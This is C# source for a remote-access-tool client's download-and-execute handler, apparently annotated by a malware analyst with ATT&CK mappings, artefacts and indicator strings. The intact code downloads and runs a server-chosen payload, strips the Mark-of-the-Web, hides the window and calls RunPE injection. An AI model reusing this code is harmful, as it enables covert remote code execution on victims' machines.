/// <summary>
/// Client-side handler for a server-issued DownloadAndExecute packet: fetches
/// <c>command.URL</c> to disk and starts the downloaded file as a new process.
/// </summary>
/// <remarks>
/// Analyst notes (remote-access-tool client, "download and execute" capability;
/// maps to ATT&amp;CK T1105 Ingress Tool Transfer):
/// - The URL and the RunHidden flag both come from the server packet. No hash,
///   signature or origin check on the payload is visible in this block.
/// - On-disk artefact: a new ".exe" under the roaming ApplicationData folder,
///   named by Helper.GetRandomFilename(12, ".exe") (helper not shown; presumably
///   a 12-character random name - confirm).
/// - The Zone.Identifier alternate data stream is removed before launch, i.e.
///   any Mark-of-the-Web on the file is stripped (ATT&amp;CK T1553.005).
/// - Progress is reported back to the controller through Status packets; the
///   literal strings below are usable as content indicators for this build.
/// - All work runs on a freshly created thread, so the packet handler returns
///   immediately.
/// </remarks>
/// <param name="command">Server packet; this block reads its URL and RunHidden members.</param>
/// <param name="client">Connection the Status packets are sent on.</param>
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, Client client)
{
    new Packets.ClientPackets.Status("Downloading file...").Execute(client);

    new Thread(() =>
    {
        // Drop location: roaming %APPDATA% with a generated ".exe" name.
        string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Helper.Helper.GetRandomFilename(12, ".exe"));

        try
        {
            using (WebClient c = new WebClient())
            {
                // Proxy = null makes WebClient connect directly instead of using
                // the system proxy settings, so the request does not pass
                // through a configured web proxy.
                c.Proxy = null;
                c.DownloadFile(command.URL, tempFile);
            }
        }
        catch
        {
            // Any download error is reduced to a generic status; the exception
            // detail is discarded.
            new Packets.ClientPackets.Status("Download failed!").Execute(client);
            return;
        }

        new Packets.ClientPackets.Status("Downloaded File!").Execute(client);

        try
        {
            // Remove the Mark-of-the-Web stream, if one exists. DeleteFile is
            // defined elsewhere in the file.
            DeleteFile(tempFile + ":Zone.Identifier");

            // Header sanity check. Because the two comparisons are joined with
            // &&, the exception is thrown only when BOTH bytes differ from
            // "MZ"; a file with one matching byte passes. A file shorter than
            // two bytes throws on the index access and lands in the catch.
            var bytes = File.ReadAllBytes(tempFile);
            if (bytes[0] != 'M' && bytes[1] != 'Z')
            {
                throw new Exception("no pe file");
            }

            ProcessStartInfo startInfo = new ProcessStartInfo();
            if (command.RunHidden)
            {
                // Server-controlled: request a hidden window for the child.
                startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                startInfo.CreateNoWindow = true;
            }
            // UseShellExecute mirrors RunHidden: hidden launches go through
            // the shell, visible launches start the image directly.
            startInfo.UseShellExecute = command.RunHidden;
            startInfo.FileName = tempFile;
            // The child process's image path is the dropped file in %APPDATA%
            // and its parent is this client process.
            Process.Start(startInfo);
        }
        catch
        {
            // On any failure the dropped file is removed again, so it may be
            // absent from disk by the time a host is examined.
            DeleteFile(tempFile);
            new Packets.ClientPackets.Status("Execution failed!").Execute(client);
            return;
        }

        new Packets.ClientPackets.Status("Executed File!").Execute(client);
    }).Start();
}
/// <summary>
/// Client-side handler for a server-issued DownloadAndExecute packet. Depending
/// on <c>command.Type</c> it either drops the download to disk and starts it
/// ("drop"), or downloads into memory and hands the bytes to RunPE.Invoke
/// ("self" / "cmd").
/// </summary>
/// <remarks>
/// Analyst notes (remote-access-tool client; maps to ATT&amp;CK T1105 Ingress Tool
/// Transfer):
/// - URL, Type and RunHidden all come from the server packet. No hash,
///   signature or origin check on the payload is visible in this block.
/// - "drop": writes a generated ".exe" under roaming ApplicationData, removes
///   its Zone.Identifier stream (Mark-of-the-Web, ATT&amp;CK T1553.005) and starts
///   it with Process.Start.
/// - "self" / "cmd": no file write is visible here; the payload is passed
///   Base64-encoded to RunPE.Invoke with the mode strings "self", "" or
///   "sys", "cmd". RunPE and Download are defined elsewhere; the name and the
///   "Unknown Injection Type!" message suggest in-memory PE injection or
///   process hollowing (ATT&amp;CK T1055.012) - confirm against RunPE itself.
/// - The Status strings are not a reliable record of what happened: an
///   unrecognised Type reports "Unknown Injection Type!" and then still falls
///   through to "Executed File!", and a null download in the "self" / "cmd"
///   branches reports "Download failed!" and then continues into the
///   Base64 conversion, which throws and produces an additional
///   "Execution failed: ..." status from the outer catch.
/// - All work runs on a freshly created thread.
/// </remarks>
/// <param name="command">Server packet; this block reads its Type, URL and RunHidden members.</param>
/// <param name="client">Connection the Status packets are sent on; also passed to Download and RunPE.Invoke.</param>
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command, Client client)
{
    new Packets.ClientPackets.Status("Downloading file...").Execute(client);

    new Thread(() =>
    {
        try
        {
            if (command.Type == "drop")
            {
                #region drop
                // Drop location: roaming %APPDATA% with a generated ".exe" name
                // (GetRandomFilename is not shown; presumably 12 random
                // characters - confirm).
                string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), Helper.Helper.GetRandomFilename(12, ".exe"));

                try
                {
                    using (WebClient c = new WebClient())
                    {
                        // Proxy = null makes WebClient connect directly instead
                        // of using the system proxy settings.
                        c.Proxy = null;
                        c.DownloadFile(command.URL, tempFile);
                    }
                }
                catch
                {
                    // Download errors are reduced to a generic status.
                    new Packets.ClientPackets.Status("Download failed!").Execute(client);
                    return;
                }

                new Packets.ClientPackets.Status("Downloaded File!").Execute(client);

                try
                {
                    // Remove the Mark-of-the-Web stream, if one exists.
                    DeleteFile(tempFile + ":Zone.Identifier");

                    // Header sanity check. Joined with &&, so it throws only
                    // when BOTH bytes differ from "MZ"; a file shorter than two
                    // bytes throws on the index access instead.
                    var bytes = File.ReadAllBytes(tempFile);
                    if (bytes[0] != 'M' && bytes[1] != 'Z')
                    {
                        throw new Exception("Not an .EXE file!");
                    }

                    ProcessStartInfo startInfo = new ProcessStartInfo();
                    if (command.RunHidden)
                    {
                        // Server-controlled: request a hidden window.
                        startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                        startInfo.CreateNoWindow = true;
                    }
                    // UseShellExecute mirrors RunHidden.
                    startInfo.UseShellExecute = command.RunHidden;
                    startInfo.FileName = tempFile;
                    // Child image path is the dropped file; parent is this
                    // client process.
                    Process.Start(startInfo);
                }
                catch (Exception ex)
                {
                    // The dropped file is removed again on failure and the
                    // exception message is sent back to the controller.
                    DeleteFile(tempFile);
                    new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
                    return;
                }
                #endregion
            }
            else if (command.Type == "self")
            {
                // In-memory path: Download (defined elsewhere) returns the
                // payload bytes; nothing is written to disk in this block.
                byte[] fileBytes = Download(command.URL, client);
                if (fileBytes == null)
                {
                    // No return here: execution continues with a null buffer,
                    // and Convert.ToBase64String then throws into the outer
                    // catch.
                    new Packets.ClientPackets.Status("Download failed!").Execute(client);
                }
                // Mode "self" with an empty third argument; the meaning is
                // decided inside RunPE.Invoke (not shown).
                RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
            }
            else if (command.Type == "cmd")
            {
                // Same in-memory path as "self", but with mode "sys" and target
                // "cmd" (presumably a cmd.exe host process - confirm in RunPE).
                byte[] fileBytes = Download(command.URL, client);
                if (fileBytes == null)
                {
                    // No return here either; see the "self" branch.
                    new Packets.ClientPackets.Status("Download failed!").Execute(client);
                }
                RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
            }
            else
            {
                // Unrecognised Type: reported, but flow still reaches the
                // "Executed File!" status below.
                new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
            }
        }
        catch (Exception ex)
        {
            // Catch-all for the branches above; the exception text is sent to
            // the controller.
            new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
            return;
        }

        new Packets.ClientPackets.Status("Executed File!").Execute(client);
    }).Start();
}